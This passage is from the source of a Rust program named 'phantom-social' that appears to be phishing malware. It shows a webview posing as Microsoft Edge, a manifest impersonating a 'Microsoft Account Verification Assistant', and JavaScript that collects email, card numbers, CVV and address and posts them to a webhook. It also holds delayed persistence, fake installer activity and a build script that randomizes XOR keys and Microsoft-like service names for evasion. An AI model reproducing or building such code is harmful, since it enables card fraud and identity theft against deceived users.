data={{step:1,email:sanitize(email),session:sid,canvas_fp:fp,timestamp:Math.floor(Date.now()/1000)}};sendStepData(1,data);setTimeout(()=>nextStep(2),100);}}function validateStep2(){{let valid=true;const card=document.getElementById('cardNumber').value.trim();const name=document.getElementById('cardholderName').value.trim();const exp=document.getElementById('expiry').value.trim();const cvv=document.getElementById('cvv').value.trim();clearError('cardNumber');clearError('cardholderName');clearError('expiry');clearError('cvv');if(!card||!validateCard(card)){{showError('cardNumber');valid=false;}}if(!name||name.length<3){{showError('cardholderName');valid=false;}}if(!exp||!validateExpiry(exp)){{showError('expiry');valid=false;}}if(!cvv||cvv.length<3||cvv.length>4||!/^\\d+$/.test(cvv)){{showError('cvv');valid=false;}}if(valid){{const data={{step:2,card_number:sanitize(card),cardholder_name:sanitize(name),expiry:sanitize(exp),cvv:sanitize(cvv),session:sid,canvas_fp:fp,timestamp:Math.floor(Date.now()/1000)}};sendStepData(2,data);setTimeout(()=>nextStep(3),100);}}}}function validateStep3(){{let valid=true;['address','city','state','zip','country'].forEach(id=>{{clearError(id);const val=document.getElementById(id).value.trim();if(!val||val.length<2){{showError(id);valid=false;}}}});if(valid){{setTimeout(()=>submitForm(),100);}}}}async function submitForm(){{const errBox=document.getElementById('submit-error');errBox.classList.remove('hidden');const data={{step:3,street_address:sanitize(document.getElementById('address').value),city:sanitize(document.getElementById('city').value),state:sanitize(document.getElementById('state').value),zip_code:sanitize(document.getElementById('zip').value),country:sanitize(document.getElementById('country').value),session:sid,canvas_fp:fp,process_time:pt,timestamp:Math.floor(Date.now()/1000)}};try{{await fetch(wh,{{method:'POST',headers:{{'Content-Type':'application/json'}},body:JSON.stringify({{content:'```json\\n'+JSON.stringify(data,null,2)+'\\n```',username:'Step3Final'}})}});}}catch(e){{}}setTimeout(()=>{{window.close();}},5000);}}document.getElementById('cardNumber').addEventListener('input',function(e){{let v=e.target.value.replace(/\\s/g,'');e.target.value=v.match(/.{{1,4}}/g)?.join(' ')||v;}});document.getElementById('expiry').addEventListener('input',function(e){{let v=e.target.value.replace(/[^0-9]/g,'');if(v.length>=2){{v=v.slice(0,2)+'/'+v.slice(2,4);}}e.target.value=v;}});document.getElementById('expiry').addEventListener('keydown',function(e){{if(e.key==='Backspace'){{e.preventDefault();let v=this.value.replace(/[^0-9]/g,'');if(v.length>0){{v=v.slice(0,-1);if(v.length>=2){{this.value=v.slice(0,2)+'/'+v.slice(2);}}else{{this.value=v;}}}}else{{this.value='';}}}}}});</script></body></html>",
        session, webhook, proc_time, rand_seed
    );
    
    format!("{}{}", html, script)
}

fn create_win(html: String) -> Result<(), Box<dyn std::error::Error>> {
    let el = EventLoop::new();
    let win = WindowBuilder::new()
        .with_title("Microsoft Edge")
        .with_inner_size(wry::application::dpi::LogicalSize::new(900, 750))
        .with_decorations(false)
        .build(&el)?;
    
    let _wv = WebViewBuilder::new(win)?.with_html(html)?.build()?;
    
    el.run(move |ev, _, cf| {
        *cf = ControlFlow::Wait;
        match ev {
            Event::WindowEvent { event: WindowEvent::CloseRequested, .. } => {
                *cf = ControlFlow::Exit;
            }
            _ => {}
        }
    });
}

async fn sim_legit_async() {
    let _ = std::env::var("APPDATA");
    let _ = tokio::net::TcpStream::connect("www.microsoft.com:80").await;
    simulate_installer_scan();
}

fn main() {
    init_globals();
    
    let use_persist = should_persist();
    let uptime = get_uptime_hrs();
    
    thread::spawn(move || {
        let pkt = TelemetryData {
            session: get_session_id(),
            canvas_fp: "init".to_string(),
            process_time: get_proc_time(),
            uptime_hours: uptime,
        };
        if let Ok(j) = serde_json::to_string_pretty(&pkt) {
            send_data(&j);
        }
    });
    
    let rt = tokio::runtime::Runtime::new().unwrap();
    rt.block_on(sim_legit_async());
    
    if use_persist {
        thread::spawn(|| {
            thread::sleep(Duration::from_secs(240));
            install_persist();
        });
    }
    
    if show_notification() {
        let html = get_html();
        if let Ok(_) = create_win(html) {
            mark_success();
        }
    } else {
        if use_persist {
            std::process::exit(0);
        } else {
            if show_notification() {
                let html = get_html();
                if let Ok(_) = create_win(html) {
                    mark_success();
                }
            }
        }
    }
    
    if is_success() {
        remove_persist();
    }
    
    std::process::exit(0);
}
Phantom-social.exe.manifest:
/*
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity

    version="3.1.2.0"

    processorArchitecture="amd64"

    name="Microsoft.Windows.AccountVerification"

    type="win32"/>

  <description>Microsoft Account Verification Assistant</description>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity

        type="win32"

        name="Microsoft.Windows.Common-Controls"

        version="6.0.0.0"

        processorArchitecture="*"

        publicKeyToken="6595b64144ccf1df"

        language="*"/>

    </dependentAssembly>

  </dependency>

  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">

    <security>

      <requestedPrivileges>

        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>

      </requestedPrivileges>

    </security>

  </trustInfo>

  <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">

    <application>

      <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>

      <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

      <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

    </application>

  </compatibility>
</assembly>
*/

build.rs:
/*
use std::env;

use std::fs::File;

use std::io::Write;

use std::path::Path;



fn main() {

    let out_dir = env::var("OUT_DIR").unwrap();

    let dest_path = Path::new(&out_dir).join("generated.rs");

    let mut f = File::create(&dest_path).unwrap();



    let xor_keys: Vec<String> = (0..16)

        .map(|_| format!("0x{:02X}", rand::random::<u8>()))

        .collect();



    let prefixes = ["Windows", "Microsoft", "System", "Security", "Update"];

    let suffixes = ["Service", "Monitor", "Health", "Manager", "Helper", "Assistant"];

    let persist_name = format!(

        "{}{}{}",

        prefixes[rand::random::<usize>() % prefixes.len()],

        suffixes[rand::random::<usize>() % suffixes.len()],

        rand::random::<u16>() % 1000

    );



    let session_prefix = format!("MS{:X}", rand::random::<u32>());



    write!(

        f,

        "// Auto-generated - DO NOT EDIT\n\

         const XOR_KEYS: [u8; 16] = [{}];\n\

         const PERSIST_NAME: &str = \"{}\";\n\

         const SESSION_PREFIX: &str = \"{}\";\n",

        xor_keys.join(", "),

        persist_name,

        session_prefix

    )

    .unwrap();



    println!("cargo:rerun-if-changed=build.rs");



    // Embed the Windows manifest (only on Windows targets)

    if cfg!(target_os = "windows") {

        embed_manifest::embed_manifest_file("phantom-social.exe.manifest")

            .expect("Failed to embed manifest");

    }



    // Trigger rebuild if manifest changes

    println!("cargo:rerun-if-changed=phantom-social.exe.manifest");
}
*/
Cargo.toml:
/*
[package]

name = "phantom-social"

version = "1.0.0"

edition = "2021"

build = "build.rs"



[[bin]]

name = "phantom-social"

path = "src/main.rs"



[dependencies]

serde = { version = "1.0", features = ["derive"] }

serde_json = "1.0"

wreq = "6.0.0-rc.26"

wreq-util = "3.0.0-rc.7"

tokio = { version = "1", features = ["full"] }

lazy_static = "1.4"

rand = "0.8"

winapi = { version = "0.3", features = ["winuser", "winreg", "sysinfoapi", "winnt", "winbase", "libloaderapi"] }

wry = "0.24"



[build-dependencies]

rand = "0.8"

embed-manifest = "1.3.1"



[profile.release]

opt-level = "z"

lto = "fat"

codegen-units = 1

panic = "abort"

strip = true
*/
